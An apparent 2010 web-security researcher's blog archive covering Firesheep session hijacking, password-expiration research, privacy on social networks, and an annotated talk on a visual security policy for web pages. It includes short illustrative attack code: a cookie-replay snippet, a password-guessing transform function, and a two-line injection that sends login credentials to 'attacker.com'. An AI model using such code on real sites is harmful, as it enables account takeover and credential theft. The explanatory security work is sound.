Tuesday, December 14, 2010

A brutally honest privacy policy

Dan Tynan has decided to cut through the legalese and confusion inherent in many privacy policies and has produced a "real" privacy policy, open-sourced for anyone to adopt. The result is hilarious and sad at once, because it reflects a lot of how "private" data may actually be used. Here's an excerpt:

"At COMPANY _______ we value your privacy a great deal. Almost as much as we value the ability to take the data you give us and slice, dice, julienne, mash, puree and serve it to our business partners, which may include third-party advertising networks, data brokers, networks of affiliate sites, parent companies, subsidiaries, and other entities, none of which we’ll bother to list here because they can change from week to week and, besides, we know you’re not really paying attention.

We’ll also share all of this information with the government. We’re just suckers for guys with crew cuts carrying subpoenas.

Remember, when you visit our Web site, our Web site is also visiting you. And we’ve brought a dozen or more friends with us, depending on how many ad networks and third-party data services we use. We’re not going to tell which ones, though you could probably figure this out by carefully watching the different URLs that flash across the bottom of your browser as each page loads or when you mouse over various bits. It’s not like you’ve got better things to do.

...

So just to recap: Your information is extremely valuable to us. Our business model would totally collapse without it. No IPO, no stock options; all those 80-hour weeks and bupkis to show for it. So we’ll do our very best to use it in as many potentially profitable ways as we can conjure, over and over, while attempting to convince you there’s nothing to worry about.

Read the rest along with commentary on Dan's blog. He notes that it’s 5,085 words shorter than Facebook’s policy, just for comparison.

Wednesday, November 3, 2010

Security Costs vs Benefits: Should companies deploy SSL to deal with Firesheep?

Yesterday, I talked about why end-users don't care about security and how that actually makes a certain amount of sense for them since the cost of behaving more securely can overwhelm the cost of an actual breach.

However, what I didn't talk about is whether this is true for companies. A single breach of a single user account may not cost a company much, but if breaches become common enough that users start leaving, the cost could be much higher.

While users trying to protect themselves from curious folk with Firesheep are counseled to use a VPN, website owners can do the encryption right from their end using SSL. But SSL has long been thought computationally costly, and even environmentally costly, due to the supposed need for extra electricity and machines.

But has anyone looked at what those costs actually are? A blog post entitled Overclocking SSL examined these costs as Google deployed HTTPS for Gmail, and made a pretty clear statement:

If there's one point that we want to communicate to the world, it's that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it's just not the case any more. You too can afford to enable HTTPS for your users.

So there you have it: the people who should be protecting users from Firesheep attacks are probably the companies who run the websites, since SSL isn't likely to cost them as much as numerous complaints and support requests from their users would. The cost equation might not be the same for all organizations, since the cost of certificates and labour can be non-trivial if you don't already have expertise on hand. But sure enough, Google has decided to provide HTTPS access by default to all Gmail users, so they clearly believe it's worth it.
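For a sense of scale, once you have a certificate, enabling HTTPS on a typical web server is mostly a configuration exercise. Here's a minimal sketch for nginx; the domain and certificate paths are hypothetical placeholders:

    # Minimal sketch of enabling HTTPS in nginx; domain and paths are
    # hypothetical placeholders.
    server {
        listen 443 ssl;
        server_name www.example.com;

        ssl_certificate     /etc/ssl/certs/example.com.crt;   # cert from your CA
        ssl_certificate_key /etc/ssl/private/example.com.key;

        location / {
            root /var/www/example.com;  # same site as before, now encrypted
        }
    }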

This leads to an interesting question: Does the burden of security always fall heavily on corporations and large organizations rather than on end-users? Many would argue that this is naive and that users must bear some responsibility; others would argue that only corporations have the resources necessary to make an impact on security. This is a much larger discussion that I expect we'll see occurring over and over again for a very long time.

Tuesday, November 2, 2010

Apathy or sensible risk evaluation: why don't people care about security?

Engineer Gary LosHuertos decided to try Herding Firesheep in New York City: he sat down in a Starbucks, opened up his laptop, started gathering profiles, and then sent messages to people whose Facebook accounts he could access, warning them of the security flaw. Some people closed up and left, but some just ignored his message and went on with their day. Confused, he sent another message, but they just didn't seem to care and continued using their accounts.

This is the most shocking thing about Internet security: not that we are all on a worldwide system held together with duct tape that has appalling security vulnerabilities; not that a freely available tool could collect authentication cookies; and certainly not that there are people unaware of either. What's absolutely incomprehensible is that after someone has been alerted to the danger (from their own account!) they would casually ignore the warning and continue about their day.

But is this shocking? To someone who cares about security, maybe. To someone who knows people? Less so.

Cormac Herley has an absolutely great paper entitled "So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users":

It is often suggested that users are hopelessly lazy and unmotivated on security questions. They chose weak passwords, ignore security warnings, and are oblivious to certificates errors. We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort.

So let's think a little bit about cookies and Firesheep. One of the ways to be most safe is to browse using a VPN. For someone who already has one set up, this is pretty much a matter of toggling something on your computer: low difficulty, and much less trouble than having your accounts hacked. You can see why many geeks think it's ridiculous that people wouldn't just secure their connections: even if you include the time spent setting up the VPN, for many folk that's a task that falls under the heading of "something I meant to do anyhow" and isn't really perceived as costly.

But if you're not a computer-savvy person with a server online to host a VPN, setting one up can be stupidly costly. Maybe you'd have to replace your router with one that can handle it. Maybe you'd have to pay for hosting. Maybe you'd have to spend hours figuring out how to generate keys, or pay someone else to do that. Maybe just figuring out what you need to do at all is going to take hours. Quickly, the hours required seem worth more than the cost of having some stranger send you messages from your own Facebook account, or maybe set your status message to something embarrassing.

Perhaps what we need to raise the cost of a security mishap is a little evil. It's actually easy to craft a Firesheep-based attack that would raise the cost high enough to make VPN hunting (or just not using the Starbucks wireless) seem worthwhile to most people: log into someone's account, delete all their status messages, notes and photos, and defriend all their friends. Since there's no easy way to back up your Facebook profile, the results would be devastating and partially unrecoverable: worth more than the pain of setting up a VPN or going without Facebook while in a coffee shop. Of course, it might be easier to litigate for theft/unauthorized access than it is to restore that profile, so I don't recommend any security vigilantes start doing this!

So I guess the take-home message here is that while it's worth trying to educate users so they can make smarter decisions, they're not necessarily being delusional or foolish when they just say "meh" and go on with their lives. If we want to make a really huge impact, we need security solutions that are so low-pain that there's no longer any rational reason to reject them.

Friday, October 29, 2010

Apparently Facebook hates privacy so much that they pay lobbyists to stop privacy laws

This maybe shouldn't surprise anyone, but Mashable is reporting that Facebook Lobbied to Kill Social Networking Privacy Act in the USA.

It's one thing to believe that privacy isn't important, or to make mistakes that expose users, but paying people to lobby against privacy legislation that might protect your users seems like a big step further. It makes me concerned as a user of the service.

Incidentally, Facebook has already broken Canadian privacy law (they're not the only ones), and likely the laws of several other countries, so I guess it makes sense that they wouldn't want to run afoul of further laws... but I really wish they'd do this by handling privacy issues better rather than paying people to make sure the laws don't come into effect. Maybe the law was simply ill-conceived (I haven't read it) but this really doesn't sound like the actions of a socially-responsible company. Very disappointing.

Thursday, October 28, 2010

Why 12 year olds may be our best bug hunters

You may have heard the news: Mozilla pays 12-year-old San Jose boy for hunting bugs in system:

It's safe to say a typical Willow Glen 12-year-old doesn't earn $3,000 for a couple of weeks' worth of work. Then again, Alex Miller is no typical 12-year-old.

Alex is a bug hunter, but the bugs he's uncovering are unlikely to end up in any entomological reference book. Instead, the bug Alex found was a valid critical security flaw buried in the Firefox web browser. For his discovery, he was rewarded a bug bounty of $3,000 by Mozilla, the parent company of Firefox.

Much of the coverage I've seen has been along the lines of "wow, if a 12 year old can find a bug, then anyone can do this!" which I think is awesome if it gets more people out looking through code in hopes of one of those $3k bounties. But I also find that attitude a little sad because, frankly, Alex Miller sounds like a pretty smart guy, and implying that what he did is easy because he's young is a bit condescending and likely incorrect.

But the more I think about it, the more I think that maybe younger bughunters have some natural advantages, and maybe we should go out of our way to recruit them. I taught in-lab tutorials to 17-year-olds for several years running, and have worked with students as young as 12 when teaching mini-courses in the spring, and they're pretty darned sharp.

Here are some assets younger folk bring to the table when it comes to hunting security flaws:

  • A different point of view -- Some teachers find it incredibly frustrating that their students just don't see the world the way they do, because it can be hard to teach without common ground, but I've always found it fascinating how my students will write code in ways completely different from what I expect. Frankly, I don't see this kind of diversity when I work with my colleagues, probably because we have similar educational backgrounds. A different way of thinking can help you find things that others are going to miss, in research or in security bug hunting!

  • Time -- Alex Miller says he spent only 90 minutes/day for around 10 days to find his bug, but in general tweens and teens can have a lot more free time than their adult counterparts. Sure, there's school and homework and often a slew of extra-curriculars, but there's usually less time spent on childcare, laundry, groceries, cooking, cleaning, and yardwork. Younger students may do some of that, but usually not all of the above.

  • Enthusiasm -- Let's face it; if you stare at code all day at work, you're not always likely to set aside 90 minutes/day to do it at home. When I was a teenager writing essays at school, 90 minutes of debugging sounded like a lot more fun!

  • Chutzpah -- It's easy for us as adults to think "meh, so many people have looked at this... I'll never find anything" and in general the students I work with have a lot more guts and are just more willing to believe that they personally will change the world if they just try. Certainly, my gaming students often propose genre-busting epic game ideas that I can just imagine getting shot down at a company meeting.

So maybe we shouldn't be saying "if a 12 year old can do it, anyone can" and instead thinking "how can I channel my inner 12 year old?"

Wednesday, October 27, 2010

Quick Hit: Firesheep

By now, probably everyone's already heard of Firesheep, the nice user-friendly way to use cookies to do session hijacking. Want to be logged in as someone else on Facebook? No problem.

It's nothing spectacular on a technical level, since it's been easy enough to use other people's cookies for quite some time, but it's a pretty impressive social hacking tool. It's making it clear to a lot of people (and media) that this is a real problem, and that it's an exploit anyone can do now.
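To see just how low the technical bar is, here's a minimal sketch of replaying a sniffed cookie outside the browser. The site and cookie value are hypothetical; in a Firesheep-style attack the cookie is simply sniffed off the open wireless because the site uses plain HTTP:

    // A sketch of session hijacking via a replayed cookie (Node.js).
    const http = require('http');

    const stolenCookie = 'session_id=abc123'; // captured from unencrypted traffic

    http.get('http://www.example.com/home', {
      headers: { Cookie: stolenCookie }, // the server now treats us as the victim
    }, (res) => {
      let body = '';
      res.on('data', (chunk) => { body += chunk; });
      res.on('end', () => console.log(body)); // the victim's logged-in page
    });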

I'm actually sort of surprised that I haven't seen this earlier: it used to be a bit of a game in the undergrad lounge to see what one could sniff off the network, with people using some tool whose name I've forgotten to display any images that users loaded while surfing on the wireless. Hijacking session cookies would have been a fun addition to our childish games -- and I'll bet plenty of college kids are using Firesheep for just that. Or for checking out their ex-boyfriends/girlfriends...

Monday, October 11, 2010

Does expiring passwords really help security?


[Photo: "Change is Easy", originally uploaded by dawn_perry]
I've heard a lot of arguments as to why expiring passwords likely won't help. Here are a few:

  • It's easy to install malware on a machine, so the new password will be sniffed just like the old.
  • It costs more: frequent password changes result in more forgotten passwords and support desk calls.
  • It irritates users, who will then feel less motivated to implement other security measures.
  • Constantly forcing people to think of new, memorable passwords leads to cognitive shortcuts like password-Sep, password-Oct, password-Nov...
And yet, many organizations continue to force regular password changes in order to improve security. But what if that's not what's really happening? Three researchers from the University of North Carolina at Chapel Hill have unveiled what they claim to be the first large-scale study on password expiration, and they found it wanting.

They focus especially on the idea that consecutive passwords will be related, and they built a system which could try a variety of transforms such as changing which letter was uppercase, duplicating letters/numbers/symbols, and even "leet" translation (e.g. raven becomes r@v3n). The implications of their results are fairly clear and potentially disturbing for those who thought password changing was providing extra security in the case of a breach:

  • With offline attacks: "On average, roughly 41% of passwords can be broken from an old password in under 3 seconds."
  • With online attacks: "An average of 13% of accounts can be broken (with certainty) in 5 online guesses, and 18% can be broken in 10 guesses."
  • "As we expand our consideration to other types of transform trees, we would not be surprised to see these success rates jump significantly."
In essence, they've shown that changing passwords doesn't provide nearly as much security as system designers had hoped, and they suggest we abandon the practice rather than continue to annoy users with a policy that has been proven ineffective.
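To get a feel for how cheap the transforms described above are, here's a small sketch (not the researchers' actual system) that generates candidate guesses from an expired password:

    // A sketch of transform-based guessing: generate plausible "new"
    // passwords from an expired one.
    function guesses(oldPassword) {
      const leet = { a: '@', e: '3', i: '1', o: '0', s: '$' };
      const candidates = new Set();

      // Toggle the case of each letter in turn.
      for (let i = 0; i < oldPassword.length; i++) {
        const c = oldPassword[i];
        if (!/[a-z]/i.test(c)) continue; // only letters have case
        const flipped = c === c.toLowerCase() ? c.toUpperCase() : c.toLowerCase();
        candidates.add(oldPassword.slice(0, i) + flipped + oldPassword.slice(i + 1));
      }

      // Apply "leet" substitutions: raven1 -> r@v3n1.
      candidates.add(oldPassword.replace(/[aeios]/g, (c) => leet[c]));

      // Increment a trailing number: password1 -> password2.
      candidates.add(oldPassword.replace(/\d+$/, (n) => String(Number(n) + 1)));

      return [...candidates];
    }

    console.log(guesses('raven1')); // Raven1, rAven1, ..., r@v3n1, raven2

Run each candidate against stolen hashes (offline) or the login form (online) and you have essentially the attack the paper describes.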

Monday, September 20, 2010

Privacy and Twitter lists

I think Twitter may have among the simplest privacy settings of any social network. Your choices are either everything you post is public, or everything you post is private.

But simple does not mean that things will stay private. As with everything on the internet, the minute you post something, someone else might choose to share it. Some researchers have actually studied how often people retweet private content on Twitter.

Something I haven't seen studied, however, is how private information can leak out through twitter lists.

Twitter allows you to make lists of people who you'd like to have grouped together. For example, I have a list of technical women who I follow. These are women in technology who I've met in person or interacted with extensively online, and I really made it for my own personal use but since it's a public list others can (and do) follow it. Presumably they're looking for more cool women to expand their social networks.

Twitter allows you to see what lists a person has been added to, and this is where it gets interesting. Let's take a look at the lists of which I am a member and see what we can learn about me.

Here are a few things you can learn at a glance:


Wait... what? Despite the fact that I explicitly chose to say a more generic "Canada" in my profile information, my current city can be determined by the fact that it shows up in several of the lists I'm on. There's of course no way to be sure that any of this is true, but when more than one person lists me as being in Ottawa it seems fairly reasonable to guess.

I'm not personally concerned (obviously, since I'm talking about all this information in a public blog post!) but some folk are much more private than I am.

So what are your options if you want to hide this information? Well, if I don't like the lists I'm on, I can... uh... There's no apparent way to leave a Twitter list. I suspect one could block the list curator, but the people revealing your location are most likely to be actual real-life friends: people you wouldn't want to block. So you'd have to resort to asking nicely, but that's assuming you even notice: while you can get notifications of new followers, you do not get notified when you're added to a list. I've been asked about exactly two of the lists I've been put on (thanks @ghc!), so obviously it's not the social norm to ask (I certainly have never asked anyone I've listed!)

A quick check says I can usually get the current (and sometimes some former) cities for many of my friends, as well as information related to their occupations, interests, and events they've attended. For most of these people, I know this isn't information they consider private either. But it's obviously possible that this could be a problem... I wonder how many people it affects in a negative way?

Maybe this is a potential little workshop paper if I have time to analyse a whole bunch of twitter lists. Anyone want to lend me a student who's interested in social media privacy?

Edit: A note for those concerned about not being that privacy-violating friend. You can make Twitter lists private if you want (it's just not the default), so just do that for the lists you think are sensitive and you're good to go!

Monday, August 23, 2010

Visual Security Policy for the Web

This is the annotated version of a presentation I gave at the 5th USENIX Workshop on Hot Topics in Security (HotSec '10). My slides tend to be designed to complement what I'm saying rather than as stand-alone pieces, so I'm writing out approximately what I said during my presentation so that you can get the whole sense of the presentation. I also make heavy use of creative commons content to put together my presentations: click through each image for attributions and more details about the photos used.

Visual Security Policy for the Web

83% of web sites have had a serious vulnerability

According to WhiteHat Security, 83% of web sites they looked at had a serious vulnerability at some point in their lifetimes.

64% of all sites have a security flaw right now

They found that nearly two thirds of all websites have such a vulnerability right now.

So really, we should be asking ourselves... why?

What makes the web so hard to secure?


What makes the web so difficult to secure?

Unfortunately, that's not an easy question to answer. If you asked 20 web security experts, you might get 20 different answers...

Some potential reasons the web is so insecure

From technologies to attackers to standards... there's a lot of little things that can go wrong and result in an insecure web page.

I don't have time to talk about all of them and I certainly don't know how to solve all of them, so I'm going to focus on one particular issue...

There are no restrictions within a web page

And that's that there are no restrictions within a web page.

Sandbox

So in the typical way of describing things, your browser makes a sandbox for your web page to play in.

Kid in sandbox

So you put your cute little baby web page in there, and things are pretty good. But eventually, you get bored...

Kid in sandbox with toys

And you want to add some toys in. User comments, latest status updates, advertisements, pictures. There's a lot of toys available for your web page. And that's great...

Kitten in "sandbox"

... if your web page is filled with nothing but cute and cuddly things that like to play together. But even cute and cuddly things have accidents...

Shark in the sandbox

And not every bit of stuff that gets added to a web page is necessarily safe. It's quite easy to wind up with sharks in your sandbox.

Separation between components can mitigate attacks

We've actually got some great web security work out there for mashups that deals with separation, so you can put all those potential sharks into separate tanks and keep other content safe.

Aquarium with separate tanks for different "content"

So your web page becomes a bit more like an aquarium with lots of separate boxes or containers or fish tanks.

But not many web developers use encapsulation

But even though we have known ways to add separation, web developers don't use it. And then you wind up with sharks pretty much everywhere...

(This actually isn't photoshopped; it's a real art installation.)

Megashark

And if you're worried about sharks running in to houses, you should be especially worried about the menace that is MegaShark. If you've watched the trailers, you know that MegaShark is a giant shark capable of jumping out of the ocean into the air and taking out an airplane.

[pause]

But no, I'm not here to talk about MegaShark.


Infographics make complex data easier to understand using visuals

What I want you to see is that the picture I have up here is an infographic. That's a graphical way to represent data, usually statistics, used by magazines and others who want to convey complex data in a way that people can readily understand.

So here you can see visually how much bigger MegaShark is than a great white or even a megalodon. The infographic shows you how fast MegaShark would have to be going, reminds you that a shark travelling that quickly would damage other nearby boats, and so on.

Equations allow more detailed analysis... if you understand them.

It's not the only way to represent the information. One could also use the equations that were used to calculate the speed of the shark. This lets you get a lot more detailed information, like the density of the water in the San Francisco Bay.

But you can only glean that information if you understand the equations. I have a math degree, and I can tell you that I certainly can't get that information at a glance: you need to know the symbols used, the physics, etc. It may provide great detailed information to experts, but for many people it will be impenetrable, and even for experts it's going to take a lot more time to analyze.

Infographics vs Equations: both have strengths and weaknesses

So that's two ways to represent information, one which is very good for quick explanation and memorable presentation, another which provides greater detail and precision.

But what does this have to do with web pages?

The people who make web pages... are also the people who make infographics

Well, the thing you should note is that the people who make web pages are often the same sort of people who make infographics. They're graphic designers, often with artistic backgrounds, and they like to work within the visual space, often to reach a wide audience.

Visual Security Policy

And that's the sort of thinking that inspired my work on visual security policy. Existing work allows extensive customization of policy, but it doesn't really give you a higher-level, at-a-glance way to deal with web page security.

Math is hard; let's draw boxes!

Or to put it more flippantly... Math is hard, let's draw boxes.

Drupal support forum

So here's an example. Let's say you're running a site with forums. This is the support forum for Drupal, a content management system. People post their questions, and other people can help them out with answers.

A possible attack

But what if one of those people answering wasn't interested in being helpful so much as in gaining control over other users? Suppose this person was able to inject a little bit of code. (I don't know of any vulnerabilities in Drupal right now, but remember: with over 80% of sites vulnerable at some point in their lifetimes, for many sites it may just be a matter of waiting.)

So here, let's suppose poster #2 has injected some code that changes the login box so that it sends usernames and passwords out to attacker.com.

Login form redirection attack code


That's about two lines of code, so it's easy enough to disguise and hide in a lengthy comment.
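The slide's snippet isn't reproduced in this transcript, but a sketch of such an injection might look like this (the form id and attacker URL are hypothetical):

    // A sketch of the injected code described above: repoint the login
    // form so that submitted credentials go to the attacker instead.
    var login = document.getElementById('user-login');
    login.action = 'http://attacker.com/steal';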


Visual Security Policy boxes on Drupal

If we wanted to stop this using boxes, we'd probably take a look at the page and think “well, that's user-inserted content there and there... there could be sharks!” and put a box around each comment separately. And then we might realize that the login box contains the username and password, so we should probably protect it too. Into a box it goes! That way if we missed a source of user content, it's still protected.

How ViSP stops the attack

So if poster #2 goes and tries to attack the page, they get stopped in their own box, and they cannot change the login box, so nothing gets sent out to attacker.com.

Visual Security Policy (ViSP)

Visual Security Policy (or ViSP for short) has 4 components. The first, as we saw in the example, is a box: a visual area on screen that has an associated security policy.

The second is a channel, which allows communication between boxes. This can be one-way.

Then there's the multibox, which is a bit different in that it's more of a shortcut. There are many cases where there are a whole bunch of similar things on a page: lists of status updates, news stories, comments, etc. We might want to give them all similar security properties, and the multibox lets us do that. Also sometimes the “next” button may add things into the page instead of loading a new one, so the multibox makes sure you don't have to care if there's 5 things or 20 – they'll still be boxed up.

Finally there's structure which is the... invisible part of visual security policy. It lets you group things into columns, etc. even if the column itself shouldn't have any special security policy.

ViSP for Drupal

So here's what the ViSP would look like for our Drupal example. It's short XML, and you'll note that the id attribute can be used to associate ViSP with the underlying HTML.
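The slide's XML isn't reproduced in this transcript, but a policy along the lines described might look roughly like this (element and attribute names are illustrative, not the precise ViSP syntax):

    <!-- Illustrative sketch only, not the exact ViSP syntax -->
    <policy>
      <multibox id="comments" />  <!-- each comment isolated in its own box -->
      <box id="user-login" />     <!-- the login form gets its own box too -->
    </policy>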

But this is a relatively small example. What would ViSP look like on a larger site?

A more complex example: Facebook

So let's look at Facebook. At a quarter of all page views in the US, you pretty much have to be able to handle Facebook if you want to claim you have a system that can do web security. And while you might have to whitelist Facebook itself, its elements will show up on other sites because that's what people expect.

And some of those are high-risk elements: user-generated content, advertisers, apps, and people who sometimes don't realise the risks they're taking. And of course, it's a fairly complex layout, which could be an issue for a visual solution.

Old Facebook home page

So here's what Facebook looked like a little while ago. They've since redesigned, but many of the elements are still there, like the menu bars.

A sample ViSP policy on the Facebook home page

And here's what a visual security policy for Facebook might look like. I've protected menu bars on the top and bottom because attackers might modify those to facilitate phishing attacks. There's my chat on the right and an advertisement on the far right, and then there's a big multibox with all my friends' status updates in there. I might trust my friends, but you never know when someone might get their account compromised or hit with a virus or something, so we want to separate those out.

ViSP for Facebook homepage (XML version)

And here's what that fairly visually busy policy looks like in XML. Not too bad, really.

Facebook Code

... Especially when you compare it to the actual code for facebook. This is some of the code used to generate the page I showed you (you can see my name in there). It's complex JavaScript, and it can be surprisingly difficult to figure out where a box should begin and end in all that mess. And that's not a critique of Facebook specifically: many web sites are generated from a variety of server and client-side systems. Writing policy for generated HTML can be very complex, and that could be one of the reasons so few web developers have embraced security policy.

Policy Creation Tool Prototype

The real question at this point is “does it work?” and I can tell you that I do indeed have a working prototype. You put it into policy creation mode through the menu or a keystroke, mouse over the page, and click to draw the boxes. Right now, it only handles boxes: you have to write in channels and multiboxes by hand.

But what about channels?

Now, you may be asking... what about the properties of channels? How do they work? And the answer is “I wish I could tell you.”

Channels are a staple of the existing work on mashups, with the idea that you'd want to set up a page so changing, say, your city could also update news, weather, etc. in other parts of the page. But within my test set, I was surprised to find very little use of this sort of intra-page communication. I don't know if this is an artifact of the pages we chose, or if there simply isn't much communication going on within the page. Perhaps most communication comes from attackers? I really don't know the answers.

Issues and Future Work

So here's some of the issues we found and some things I'd like to do. The big issue with ViSP is that it can only handle visual parts of the page, so if you've got JavaScript in your header, there's no way to encapsulate that. We found that in many cases, JavaScript was included where it was used, so you'd have menu code and the menu right together where the menu is displayed in the page instead of in the headers. But that may not always be the case.

It's unclear how that's going to work, just like it's unclear about how channels will work.

Several people, including one of my anonymous reviewers, rightly suggested that ViSP might be even easier if it could be deployed not as separate XML but instead as a “security stylesheet” in CSS. So we're working on that. We're also putting together a user study for the fall so we can answer the question of whether it really is more usable. And of course, there are more tests to be run against other websites and real-world attacks.

Open Questions

Since this is HotSec, here's a few questions to get the discussion started:
- Is ViSP really more usable? I've gotten really positive responses in my informal discussions with web folk, but it's still an open question.
- How much communication goes on within the page? Was that a fluke of our test set or have we learned something about normal web behaviours?
And finally
- What technologies should ViSP play well with to provide a complete solution?
This is only one piece of the web security puzzle that deals with one part of the web security problem – how does it need to interact with others to provide a complete solution?

Thanks for listening!

Want to know more? You can read the whole paper, "Visual Security Policy for the Web," in the HotSec '10 proceedings.
You can also comment here or contact me at terri (at) zone12.com if you have any questions or ideas you'd like to discuss.

Thursday, August 19, 2010

Privacy: Not just for people who are doing bad things

I'm happy to see that Gizmodo is already recommending that people disable Facebook Places, in as much as you really can. The article has a nice step-by-step on how to limit how much your friends can (accidentally or intentionally) violate your privacy.

But I take issue with the fact that their examples were "you're lying to your girlfriend" and "you're cheating on your wife."  Seriously?  I know they were trying to be funny, but the implication you get from the article is that privacy should only matter in this way if you've got something to hide.  But that's not the case:

What about a parent who doesn't want to advertise to strangers the exact geo-location of the parks his kids play in every day?

What about a woman who has received threats from unpleasant people who feel that women should not be involved in open source software?  (I wish I were kidding, but this happened to me, and other people receive threats from disturbed individuals online.)

What about someone shopping for an engagement ring who meets a friend at the mall?

There are plenty of reasons one might prefer privacy. I think we would do well to include this sort of example in articles, so that even those living utterly honest lives will realize that privacy is important to them and to the people they care about.

Friday, July 9, 2010

Preparing some curricula on web security

Among the other cool things I'm doing this summer is working as a teaching assistant for 1.5 days' worth of tutorials on the subject of web security. This is part of my national research group's "summer school" program, where we try to give our graduate students more background in other areas of security. I'm working up a list of potential topics so we can get our teaching materials together.

So... What would you want to learn in a short course on web security? What do you wish other people knew about web security?

Here's my brainstorming list, to be updated as new things occur to me:

Attacks

Defenses

  • Best coding practices
  • Web Application Firewalls
  • Web Vulnerability Scanners
  • Tainting
  • Mashup solutions (e.g. MashupOS, OMash)
  • Policies (e.g. SOMA, BEEP, CSP)
  • Penetration testing techniques

Notes: The tentative plan is to separate things into a hands-on lab tutorial (probably using WebGoat) and a set of lectures, mostly running simultaneously. We're going to have some top-notch students here, since we're drawing from a pool of smart security researchers to start, so we can cover a lot of ground and go much further in depth than we might teaching developers with no security background.

Tuesday, June 29, 2010

A crash course in the social media equivalent of defensive driving

How can you stay safe and keep things private while still taking part in online life? I'm a web security researcher, so I get asked this fairly frequently.  And it's easy to see how people get overwhelmed by all the news stories, the marketing blurbs, and the constantly changing policies.

Why I'm not telling you to quit Facebook

Let's say you're worried about your risk of getting into a car accident.  Do you sell your car and refuse to get into any moving vehicle?  No.  Refusing to use a car might make you safer, but it would be quite isolating and, depending on where and how you live, very difficult.  Just as many people live without cars, you can live without social networking, but there are some significant costs to refusing to participate.  Many people's need or desire to participate is much stronger than the risks they face.

If you're worried about car accidents, you've got other options to manage your risks than giving up your car.  You can learn to drive defensively.  You can make sure you wear your seatbelt.  You can learn about the safety ratings and use cars that perform better in safety tests.  You can refuse to drive places that are dangerous.

So what I'm hoping to do here is give you a crash course in the social media equivalent of defensive driving.

The web is not a safe place

When I learned to drive, my driving instructor often reminded me that I had to treat every car on the road as if it were being driven by a moron who might swerve into my lane at any time.   It might seem like a very negative point of view, but it's a very practical one that's helped me avoid accidents on numerous occasions simply because I was expecting it.

My blog is called Web Insecurity for a reason.  Nearly 2/3 of web pages currently have a serious vulnerability.  So that means no matter what the policy is, how careful you are, or how careful your friends are... there's a good chance you are going to view some code controlled by a bad guy, and they could get information about you that you don't want them to have.  It's often very easy to exploit these vulnerable parts of a website.  75% of websites with malicious code are legitimate sites.   

You may be thinking, "sure, but no one's going to care about my data."  And you may be right.  But if a bad guy is trying to make a company look terrible, one way to do so is to expose information about all of their users.  You can definitely wind up as collateral damage.

Learn your legal protections

Learning about legal stuff can be time-consuming and confusing, and frankly companies may violate laws anyhow.  But it's still worth learning a bit about your rights. The EFF has quite an impressive body of work covering free speech, privacy, intellectual property and other important issues, and they do a great job of translating legal speak into clear, comprehensible articles.   You might also consider reading bloggers like Michael Geist, and your country may have great resources like the Office of the Privacy Commissioner of Canada.

Remember that things that may seem similar often have very different legal protections.  For example, if my credit card number is stolen, there are laws that limit my liability to $50.   But that's not true about all money transactions online:  Debit/bank cards have no such legal protection.  Some modern credit cards that require a PIN have no such protection even though these cards aren't actually safe. You may have no legal protection from your bank if you don't follow their security procedure to the letter, and those security requirements of online banks can be pretty crazy: Do you reboot your computer every time you bank?  No?  You might be on the hook if someone compromises your account!

So yeah.  It's a bit of work, but it's worth it to at least learn about the issues that affect you.

Learn the controls

It may seem a bit silly, given that I've already told you that websites can easily be compromised, but if you're managing risks you should learn to use your privacy controls, choose good passwords and security questions, and keep those things private.  Again, it's about managing your risks: even if these controls can't make you 100% safe, they might make you safer.


Companies are not your friends

For many companies online, you are not really their primary customer: your time and your personal information are assets the company sells to their advertisers.  You have to expect to be treated accordingly, and you have to treat every company or organization you interact with online as a potential hazard.  Many companies intentionally or unintentionally violate privacy laws and even violate their own privacy rules.  And privacy rules change, sometimes because the company itself changed them, sometimes because it got bought out by another company.  The guarantees made when you signed up for the site are unlikely to hold a year from now, but it may be nigh impossible to remove your data from the system when things change.

And that's just the "legitimate" problems that could affect you: there's a good chance any company's sites could be attacked and your data exposed as a result -- it happens to fully legitimate companies all the time, no matter how good their intentions towards you and your data.

Choose your friends wisely

You wouldn't tell all your secrets to the office gossip, but online your friends may be "forced" to become gossips either through malicious software or through changing policies.  It sounds like some crazy super-spy movie: trust no one!  Your friends could be compromised!  But once again, just like I'm not telling you to delete your facebook account, I'm not going to tell you not to share, just to be defensive.

For example, I have a couple of friends who really enjoy Facebook games.  They seem to install every new thing that comes along and invite me to join.  Nothing wrong with that, right?  I mean, if I don't want to join, I just don't, and that's the end of it.  Except that it's not: my friends have all these games and thus all these extra ways that someone might break in to their accounts.  And indeed, these are the folk who wind up with compromised accounts more often than most.   So while these are great people who I'd be happy to share job concerns or relationship woes with in real life... It's too risky for me to share private stuff with them online.  They are the office gossips, whether they mean to be or not.  They're not the only ones who put me at risk (any friend can end up on the wrong end of a broken website) but they're the riskiest.


Choose what you want to share

The biggest part of managing your risk is choosing what you want to share online.  Here's a few questions you might want to ask yourself:
  1. Will this embarrass me if it gets out?
  2. Will this affect my safety?
  3. Will this affect my employment?
  4. Will this affect my family/friends?
If your job requires you to be a role model, you may have to be a role model even in your off-hours. Maybe it shouldn't be that way, but let's be pragmatic: you have to assume that it is that way.  

You have to assume that anything you share online could become public knowledge.  You can't trust the companies, you can't assume their sites are safe, and you can't even trust your friends because of unsafe websites.  

Think before you share.



Using a pen name

One other way to manage risk is to use a pen name or pseudonym.  Lots of people do this to give them a layer of privacy, especially when trying out something new like starting a silly blog, or when engaging in discussion that could be sensitive such as online political debate.  Sometimes it's even an open secret that so-and-so goes by a nickname online, and the only reason they do is to make it harder for potential employers to come up with a list of everything they do online when searching their legal name and given email address.

This is a great tool if you want some more freedom to speak, but people sometimes will do the legwork necessary to figure out who you are, especially if you're high-profile or saying something unpopular.  So pen names are great, but do remember that they're not 100% guaranteed to keep you safe.  Again, it's another way to manage risks.

No matter what you do, everything may become public

I've said this a bunch of different ways, but this is the real take-home message here: No matter how careful you are, anything you do online can become public knowledge.   It's up to you to manage your risks accordingly.

But don't despair -- it may sound stupidly hard, but you're already handling issues of trust and privacy every time you choose to tell a story to a friend or complain about work at a party.  You might have to pretend you're in a spy movie and trust no one, or you might decide some things are perfectly fine to share with the world.  Just try to make an informed decision.

Friday, May 21, 2010

No Website Left Behind: Are We Making Web Security Only For The Elite?

This is an annotated version of my presentation at W2SP 2010, since I realized my slides by themselves are missing a lot of the story. The full paper is available from the conference website and I should be putting up an HTML version shortly.

w2sp: Slide 0: No Web Site Left Behind: Are we making web security only for the elite?

Hi, I'm Terri, and I'm here to talk about whether we're excluding some very important people when it comes to web security.

The first thing you need to know is that...

